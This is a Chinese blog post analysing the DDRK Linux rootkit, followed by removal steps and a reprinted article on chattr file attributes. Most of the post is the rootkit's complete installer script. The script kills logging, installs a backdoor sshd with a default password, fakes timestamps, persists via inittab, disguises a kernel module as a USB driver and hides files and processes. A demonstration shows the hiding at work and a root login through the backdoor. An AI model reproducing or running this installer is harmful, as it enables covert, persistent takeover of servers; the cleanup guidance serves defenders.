2012年9月11日 星期二

Linux下rootkit-ddrk攻击获得root权限以及清除方法

今天在主機上面喵到一隻程式名為ttyload,查了一下竟是一隻rootkit 工具...


DDRK是一个Linux结合shv和adore-ng优点,内核级别的rootkit。
DDRK中包含的文件:
netstat  #替换系统中的netstat,从ssh配置文件中读取端口并隐藏
rk.ko  #内核模块,实现文件和进程的隐藏功能
setup  #rootkit安装文件
tty  #ava工具
bin.tgz
         —ttymon
         —sshd.tgz
                   —.sh
                            —shdcf2  #sshd配置文件
                            —shhk
                            —shhk.pub
                            —shrs
                            —sshd  #sshd主程序
因此只要把这些文件上传到服务器上并成功运行,就可以获得该服务器的root权限。为所欲为,无所不能。
setup内容如下:
#!/bin/bash
##########define variables##########
DEFPASS=123456    //默认密码
DEFPORT=43958    //默认端口
BASEDIR=`pwd`
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
##########check is root##########
if [ "$(whoami)" != "root" ]; then
   echo “BECOME ROOT AND TRY AGAIN”
   echo “”
   exit
fi
##########extract all tar##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
##########kill syslogd##########
killall -9 syslogd >/dev/null 2>&1
sleep 2
##########remove sh.conf##########
if [ -f /etc/sh.conf ]; then
  rm -rf /etc/sh.conf         //经过md5sum加密过的密码文件
fi
##########initialize sshd configuration##########
if test -n “$1″ ; then
   echo “Using Password : $1″
   cd $BASEDIR/bin
   echo -n $1|md5sum > /etc/sh.conf
else
   echo “No Password Specified, using default – $DEFPASS”
   echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
if test -n “$2″ ; then
   echo “Using ssh-port : $2″
   echo “Port $2″ >> $BASEDIR/bin/.sh/sshd_config
   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
   echo “No ssh-port Specified, using default – $DEFPORT”
   echo “Port $DEFPORT” >> $BASEDIR/bin/.sh/sshd_config
   cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
   mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
###########creating dirs##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
   rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
   rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
if [ -f /sbin/ttyload ]; then
   chattr -AacdisSu /sbin/ttyload
   rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
   rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
   rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR
##########modify inittab##########
cp /etc/inittab /etc/.inittab
sed -e ’s@^1:2345@0:2345:once:/usr/sbin/ttyload\n&@’ /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
echo “/sbin/ttyload -q > /dev/null 2>&1″ > /usr/sbin/ttyload
echo “/sbin/ttymon > /dev/null 2>&1″ >> /usr/sbin/ttyload
echo “${HOMEDIR}/tty i \`pidof ttyload\` > /dev/null 2>&1″ >> /usr/sbin/ttyload
echo “${HOMEDIR}/tty i \`pidof ttymon\` > /dev/null 2>&1″ >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload > /dev/null 2>&1
touch -amcr /bin/ls /etc/inittab
###########make sure inittab has modified##########
if [ ! "`grep ttyload /etc/inittab`" ]; then
   echo “# WARNING – SSHD WONT BE RELOADED UPON RESTART ”
   echo “# inittab shuffling probly fucked-up ! ”
fi
##########load rk.ko##########
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR
##########replace netstat##########
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat
##########hide all files and process##########
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttyload` > /dev/null 2>&1
$HOMEDIR/tty i `pidof ttymon` > /dev/null 2>&1
##########load rk.ko on boot##########
cat > /etc/sysconfig/modules/ehci.modules << EOF
#!/bin/sh
#install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1
##########check iptables setting##########
if [ -f /sbin/iptables ]; then
   echo “`/sbin/iptables -L INPUT | head -5`”
else
   echo “”
   echo “# lucky for u no iptables found”
fi
##########start syslogd##########
/sbin/syslogd -m 0

# ./setup 123 3333    //设置密码为123,端口号为3333
Using Password : 123
Using ssh-port : 3333
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
隐藏效果查看:
查看进程
# ps -ef | egrep -i “ttyload|ttymon”
root     24761 17990  0 13:29 pts/2    00:00:00 egrep -i ttyload|ttymon
查看端口
# netstat -ntplu
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2117/hpiod
-                   tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      2267/mysqld
tcp        0      0 0.0.0.0:43958               0.0.0.0:*                   LISTEN      -
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2134/cupsd
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2295/sendmail: acce
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2122/python
udp        0      0 0.0.0.0:32768           0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:68              0.0.0.0:*                           19752/dhclient
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           2417/avahi-daemon:
udp        0      0 0.0.0.0:631             0.0.0.0:*                           2134/cupsd
查看加载模块
# lsmod | grep -i ehci-hcd
查看rootkit相关文件
# ls -dl /lib/libsh.so  /usr/lib/libsh  /etc/sh.conf  /sbin/ttyload  /sbin/ttymon    /bin/ttymon /usr/sbin/ttyload
ls: /bin/ttymon: No such file or directory
-rw-r–r– 1 2618748389 4063569279     36 Nov 28  2006 /etc/sh.conf
drwxr-xr-x 2 2618748389 4063569279   4096 May 11 13:28 /lib/libsh.so
-rwxr-xr-x 1 2618748389 4063569279 212747 Nov 28  2006 /sbin/ttyload
-rwxrwxr-x 1 2618748389 4063569279  93476 Nov 28  2006 /sbin/ttymon
drwxr-xr-x 2 2618748389 4063569279   4096 May 11 13:28 /usr/lib/libsh
-rwxr-xr-x 1 2618748389 4063569279    171 Nov 28  2006 /usr/sbin/ttyload
查看/etc/inittab文件
# Run gettys in standard runlevels
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
验证:
已攻破并成功执行的主机IP为:192.168.27.129
从另一台登录192.168.27.129,密码为123,端口号为3333
[root@localhost ~]# ssh 192.168.27.129 -p 3333
Last login: Thu Nov 11 11:20:59 2010 from 192.168.27.1
[sh]  w.e.l.c.o.m.e
[sh]  To The DoDo’s Rootkit
[root@DoDo:/root]# 
[root@DoDo:/root]# env
TERM=xterm
SHELL=/bin/bash
SSH_CLIENT=192.168.27.130 38824 3333
SSH_TTY=/dev/pts/3
USER=root
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:
mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.
csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:
*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp
=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MAIL=/var/spool/mail/root
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:/usr/local/sbin:/usr/lib/libs:.
PWD=/root
MACHINE=DoDo
PS1=\[\033[0;36m\][$ID@\[\033[1;37m\]$MACHINE\[\033[0m\]\[\033[0;36m\]:${PWD}]#\[\033[0m\]
SHLVL=1
HOME=/usr/lib/libsh
ID=root
LOGNAME=root
_=/bin/env
至此,就可以完全控制192.168.27.129了。
到192.168.27.129上查看登录用户:
# w
 13:40:55 up  3:40,  0 users,  load average: 1.23, 0.93, 0.77
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
只有本地用户。
清除方法:
# cd /usr/lib/libsh
# modprobe -r ehci-hcd
# ./tty u /etc/sysconfig/modules/ehci.modules
Checking for adore  0.12 or higher …
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sysconfig/modules/ehci.modules
# rm -rf /lib/modules/`uname -r`/kernel/drivers/usb/host/ehci-hcd.ko
 # ./tty u /etc/sh.conf
Checking for adore  0.12 or higher …
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#  ./tty u /lib/libsh.so
Checking for adore  0.12 or higher …
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#  ./tty u /sbin/ttyload
Checking for adore  0.12 or higher …
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# ./tty u /usr/sbin/ttyload
Checking for adore  0.12 or higher …
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
#  ./tty u /sbin/ttymon
Checking for adore  0.12 or higher …
Failed to authorize myself. No luck, no adore?
Adore NOT installed. Exiting.
# rm -rf /etc/sh.conf /lib/libsh.so /usr/lib/libsh /sbin/ttyload /usr/sbin/ttyload /sbin/ttymon
# rm –rf /bin/netstat
# vim /etc/inittab 去掉0:2345:once:/usr/sbin/ttyload
其实,还应该检查系统漏洞在何处,以绝后患。
本文出自 “燕雀安知鸿鹄之志哉” 博客
文件直接進行刪除時會出現Operation not permitted
,可以參考我的删除文件提示:Operation not permitted 這一篇


删除文件提示:Operation not permitted


http://www.pcdog.com/edu/linux/02/01/t314262.html

删除文件提示:Operation not permitted
来源: 作者:佚名 2007-12-30 出处:pcdog.com



freebsd
系统管理员
linux



  一些文件看上去可能一切正常,但当您尝试删除的时候,居然也会报错,就象下边一样:
 
  [root@linux236 root]# ls -l 1.txt
 
  -rw-r——r—— 1 root root 0 Aug 5 23:00 1.txt
 
  [root@linux236 root]# rm -rf 1.txt
 
  rm: cannot unlink `1.txt': Operation not permitted
 
  您是全能root用户,居然系统告诉您操作不允许,是Linux疯了么?当然不是,如果您会用lsattr命令,问题就有了答案。
 
  [root@linux236 root]# lsattr
 
  ——i—— ./1.txt
 
 -------------- ./weiqi.ldif
 -------------- ./qi.schema
 
  秘密终于暴露了,在lsattr命令下,这个1.txt文件带有一个"i"的属性,所以才不可以删除。您现在可以用下边的一系列命令:
 
  [root@linux236 root]# lsattr 1.txt
 
  ——i—— 1.txt
 
  [root@linux236 root]# chattr -i 1.txt
 
  [root@linux236 root]# rm -rf 1.txt
 
  [root@linux236 root]#
 
  成功了,这个属性专门用来保护重要的文件不被删除,通常的情况下,懂得用这几个命令的通常系统管理员有能力判断这个文件是否可以被删除。如果您想给一个文件多加点保护,可以使用下边的命令:
 
  chattr +i filename
 
  命令,这样一来,想要删除这个文件就要多一个步骤。同时,这样的文件也是不可以编辑和修改的。只有root用户才能使用chattr命令。此命令可以在Linux ext2或ext3系统上使用。
 
  类似于和Windows文件系统,不能随意删除的文件多半都有其道理,即使您知道如何删除,都应该三思而后行。
 
  freebsd chflags
 
  用法:chflags [参数] 关键词 档案
 
  常用关键词:
 
  schg 档案完全无法被修改(super-user only)。noschg(Anti)
 
  sappend 档案內容只能用附加(append)的方式修改(super-user only)。nosappend(Anti)
 
  sunlink 档案无法被刪除或者重命名(super-user only)。nosunlink(Anti)
 
  uchg 档案完全无法被修改(super-user only 或者一般使用者)。nouchg(Anti)
 
  uappend 档案內容只能用附加(append)的方式修改(super-user only 或者一般使用者)。uappend(Anti)
 
  uunlink 档案无法被刪除或者重命名(super-user only 或者一般使用者)。nouunlink(Anti)
 
  uchg 用于文件时,owner 不能修改文件,也不能删除文件或者对文件重命名;nouchg(Anti)
 
  uappend 用于文件时,owner 只能以 append 的方式修改文件,不能删除文件或者对文件重命名;uunlink 用于文件时,owner 可以对文件进行修改,但不能删除文件或者对文件重命名。nouappend(Anti)
 
  uchg 用于目录时,owner 不能删除目录或者重命名目录,可以修改目录中已有的文件,但不能在目录中添加文件,也不能删除目录中的文件或者对其重命名;uappend 用于目录时,owner 不能删除目录或者重命名目录,可以修改目录中已有的文件和在目录中添加文件,不能删除目录中的文件或者对其重命名;uunlink 用于目录时,owner 不能删除目录或者重命名目录,可以修改目录中已有的文件和在目录中添加文件,也可以删除目录中的文件或者对其重命名。
 
  结论:uchg>uappend>uunlink.